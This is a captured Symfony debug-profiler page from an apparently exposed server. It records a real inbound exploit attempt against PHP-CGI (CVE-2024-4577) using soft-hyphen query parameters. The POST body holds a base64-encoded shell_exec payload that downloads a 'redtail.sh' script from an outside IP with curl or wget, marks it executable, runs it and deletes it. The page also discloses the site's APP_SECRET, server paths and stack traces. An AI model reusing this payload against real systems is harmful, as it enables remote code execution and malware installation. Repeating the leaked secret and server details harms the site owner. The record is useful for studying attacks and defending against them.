https://138.201.39.205/hello.world?%ADd_allow_url_include%3D1_%ADd_auto_prepend_file%3Dphp%3A%2F%2Finput=

Forwarded to
ErrorController (f995ca)
Method
POST
HTTP Status
404
IP
109.123.239.165
Profiled on
Token
e9d359

n/a

Request

GET Parameters

Key Value
�d_allow_url_include=1_�d_auto_prepend_file=php://input 
""

POST Parameters

Key Value
<?php_shell_exec(base64_decode("Y2QgL3RtcCB8fCBjZCAvdmFyL3RtcDsgY3VybCBodHRwOi8vMTc4LjE2LjU1LjIyNC9zaCAtbyByZWR0YWlsLnNoIHx8IHdnZXQgaHR0cDovLzE3OC4xNi41NS4yMjQvc2ggLU8gcmVkdGFpbC5zaDsgY2htb2QgK3ggcmVkdGFpbC5zaDsgLi9yZWR0YWlsLnNoIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcDsgcm0gLXJmIHJlZHRhaWwuc2g 
"")); echo(md5("Hello CVE-2024-4577")); ?>"

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_remove_csp_headers 
true

Request Headers

Header Value
accept 
"*/*"
connection 
"keep-alive"
content-length 
"325"
content-type 
"application/x-www-form-urlencoded"
host 
"138.201.39.205:443"
upgrade-insecure-requests 
"1"
user-agent 
"libredtail-http"
x-php-ob-level 
"1"

Request Content

Raw

<?php shell_exec(base64_decode("Y2QgL3RtcCB8fCBjZCAvdmFyL3RtcDsgY3VybCBodHRwOi8vMTc4LjE2LjU1LjIyNC9zaCAtbyByZWR0YWlsLnNoIHx8IHdnZXQgaHR0cDovLzE3OC4xNi41NS4yMjQvc2ggLU8gcmVkdGFpbC5zaDsgY2htb2QgK3ggcmVkdGFpbC5zaDsgLi9yZWR0YWlsLnNoIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcDsgcm0gLXJmIHJlZHRhaWwuc2g=")); echo(md5("Hello CVE-2024-4577")); ?>

Response

Response Headers

Header Value
cache-control 
"no-cache, private"
content-type 
"text/html; charset=UTF-8"
date 
"Thu, 23 Oct 2025 13:04:22 GMT"
x-debug-exception 
"No%20route%20found%20for%20%22POST%20%2Fhello.world%22"
x-debug-exception-file 
"%2Fhome%2Fkulahcioglu%2Fefinans%2Fvendor%2Fsymfony%2Fhttp-kernel%2FEventListener%2FRouterListener.php:136"
x-debug-token 
"e9d359"
x-debug-token-link 
"https://138.201.39.205/_profiler/f995ca"
x-previous-debug-token 
"f995ca"
x-robots-tag 
"noindex"

Cookies

Request Cookies

No request cookies

Response Cookies

No response cookies

Session

Session Metadata

No session metadata

Session Attributes

No session attributes

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
APP_ENV 
"dev"
APP_SECRET 
"5db00d896d6f940e327a1bb88e9d581c"

Defined as regular env variables

Key Value
APP_DEBUG 
"1"
CONTENT_LENGTH 
"325"
CONTENT_TYPE 
"application/x-www-form-urlencoded"
DOCUMENT_ROOT 
"/home/kulahcioglu/efinans/public"
DOCUMENT_URI 
"/index.php"
FCGI_ROLE 
"RESPONDER"
GATEWAY_INTERFACE 
"CGI/1.1"
HOME 
"/var/www"
HTTPS 
"on"
HTTP_ACCEPT 
"*/*"
HTTP_CONNECTION 
"keep-alive"
HTTP_CONTENT_LENGTH 
"325"
HTTP_CONTENT_TYPE 
"application/x-www-form-urlencoded"
HTTP_HOST 
"138.201.39.205:443"
HTTP_UPGRADE_INSECURE_REQUESTS 
"1"
HTTP_USER_AGENT 
"libredtail-http"
PHP_SELF 
"/index.php"
QUERY_STRING 
"%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
REDIRECT_STATUS 
"200"
REMOTE_ADDR 
"109.123.239.165"
REMOTE_PORT 
"43902"
REQUEST_METHOD 
"POST"
REQUEST_SCHEME 
"https"
REQUEST_TIME 
1761224662
REQUEST_TIME_FLOAT 
1761224662.6239
REQUEST_URI 
"/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
SCRIPT_FILENAME 
"/home/kulahcioglu/efinans/public/index.php"
SCRIPT_NAME 
"/index.php"
SERVER_ADDR 
"138.201.39.205"
SERVER_NAME 
"efinans.kulahcioglu.com"
SERVER_PORT 
"443"
SERVER_PROTOCOL 
"HTTP/1.1"
SERVER_SOFTWARE 
"nginx/1.14.0"
SYMFONY_DOTENV_VARS 
"APP_ENV,APP_SECRET"
USER 
"www-data"

Sub Requests 1

ErrorController (token = f995ca)

Key Value
_controller 
"error_controller"
exception 
Symfony\Component\HttpKernel\Exception\NotFoundHttpException {#143
  -statusCode: 404
  -headers: []
  #message: "No route found for "POST /hello.world""
  #code: 0
  #file: "/home/kulahcioglu/efinans/vendor/symfony/http-kernel/EventListener/RouterListener.php"
  #line: 136
  -previous: Symfony\Component\Routing\Exception\ResourceNotFoundException {#127 …}
  trace: {
    /home/kulahcioglu/efinans/vendor/symfony/http-kernel/EventListener/RouterListener.php:136 {
      Symfony\Component\HttpKernel\EventListener\RouterListener->onKernelRequest(RequestEvent $event) …
      › 
      ›     throw new NotFoundHttpException($message, $e);} catch (MethodNotAllowedException $e) {
    }
    /home/kulahcioglu/efinans/vendor/symfony/event-dispatcher/Debug/WrappedListener.php:117 {
      Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object $event, string $eventName, EventDispatcherInterface $dispatcher): void …
      › 
      › ($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher);arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#73 …}
        ...: {
          "kernel.request"
          Symfony\Component\HttpKernel\Debug\TraceableEventDispatcher {#65 …}
        }
      }
    }
    /home/kulahcioglu/efinans/vendor/symfony/event-dispatcher/EventDispatcher.php:230 {
      Symfony\Component\EventDispatcher\EventDispatcher->callListeners(iterable $listeners, string $eventName, object $event) …
      ›     }    $listener($event, $eventName, $this);}
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#73 …}
        $eventName: "kernel.request"
        $dispatcher: Symfony\Component\HttpKernel\Debug\TraceableEventDispatcher {#65 …}
      }
    }
    /home/kulahcioglu/efinans/vendor/symfony/event-dispatcher/EventDispatcher.php:59 {
      Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object $event, string $eventName = null): object …
      › if ($listeners) {    $this->callListeners($listeners, $eventName, $event);}
      arguments: {
        $listeners: [ …7]
        $eventName: "kernel.request"
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#73 …}
      }
    }
    /home/kulahcioglu/efinans/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:151 {
      Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object $event, string $eventName = null): object …
      › try {    $this->dispatcher->dispatch($event, $eventName);} finally {
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#73 …}
        $eventName: "kernel.request"
      }
    }
    /home/kulahcioglu/efinans/vendor/symfony/http-kernel/HttpKernel.php:133 {
      Symfony\Component\HttpKernel\HttpKernel->handleRaw(Request $request, int $type = self::MASTER_REQUEST): Response …
      › $event = new RequestEvent($this, $request, $type);$this->dispatcher->dispatch($event, KernelEvents::REQUEST);arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#73 …}
        $eventName: "kernel.request"
      }
    }
    /home/kulahcioglu/efinans/vendor/symfony/http-kernel/HttpKernel.php:79 {
      Symfony\Component\HttpKernel\HttpKernel->handle(Request $request, int $type = HttpKernelInterface::MASTER_REQUEST, bool $catch = true) …
      › try {    return $this->handleRaw($request, $type);} catch (\Exception $e) {
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#6 …}
        $type: 1
      }
    }
    /home/kulahcioglu/efinans/vendor/symfony/http-kernel/Kernel.php:196 {
      Symfony\Component\HttpKernel\Kernel->handle(Request $request, int $type = HttpKernelInterface::MASTER_REQUEST, bool $catch = true) …
      › try {    return $this->getHttpKernel()->handle($request, $type, $catch);} finally {
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#6 …}
        $type: 1
        $catch: true
      }
    }
    /home/kulahcioglu/efinans/public/index.php:28 {$request = Request::createFromGlobals();$response = $kernel->handle($request);$response->send();
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#6 …}
      }
    }
  }
}
logger 
Symfony\Bridge\Monolog\Logger {#87 …6}